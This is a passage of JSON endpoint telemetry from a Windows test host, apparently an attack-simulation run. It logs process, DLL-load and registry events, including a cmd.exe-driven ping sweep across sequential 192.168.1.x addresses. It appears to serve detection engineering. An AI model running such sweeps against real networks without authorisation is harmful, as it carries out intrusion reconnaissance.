"{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572066990000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "event_type": "process", - "pid": 4864, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572071840000, - "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.18", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6964, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}", - "unique_ppid": 
"{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": 
"{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572071990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "event_type": "process", - "pid": 6964, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572076990000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.19", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - 
"parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 792, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - 
"event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572077140000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "event_type": "process", - "pid": 792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"subtype": "terminate", - "timestamp": 131883572081830000, - "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.20", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4808, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - 
"image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4808, - "process_name": "PING.EXE", - 
"process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572081990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeHigh", - "registry_value": "SecureTimeHigh", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeEstimated", - "registry_value": "SecureTimeEstimated", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeLow", - "registry_value": "SecureTimeLow", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", - "registry_value": "RunTime", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - 
"event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeTickCount", - "registry_value": "SecureTimeTickCount", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeConfidence", - "registry_value": "SecureTimeConfidence", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeHigh", - "registry_value": "SecureTimeHigh", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeEstimated", - "registry_value": "SecureTimeEstimated", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - 
"process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeLow", - "registry_value": "SecureTimeLow", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", - "registry_value": "RunTime", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeTickCount", - "registry_value": "SecureTimeTickCount", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "registry", - "pid": 604, - "process_name": "lsass.exe", - "process_path": "C:\\WINDOWS\\system32\\lsass.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeConfidence", - "registry_value": "SecureTimeConfidence", - "timestamp": 131883572084490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" - }, - { - "event_type": "process", - "pid": 4808, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 
131883572086830000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.21", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6828, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": 
"C:\\Windows\\System32\\msvcrt.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572086990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "event_type": "process", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572091990000, - "unique_pid": "{42FC7E13-CB58-5C05-0000-0010CFA45101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.22", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4740, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": 
"C:\\Windows\\System32\\KernelBase.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4740, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572092140000, - "unique_pid": "{42FC7E13-CB59-5C05-0000-00103DA75101}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\SettingsRequests", - "registry_value": "SettingsRequests", - "timestamp": 131883572094330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" - }, - { - "event_type": "registry", - "pid": 2664, - "process_name": 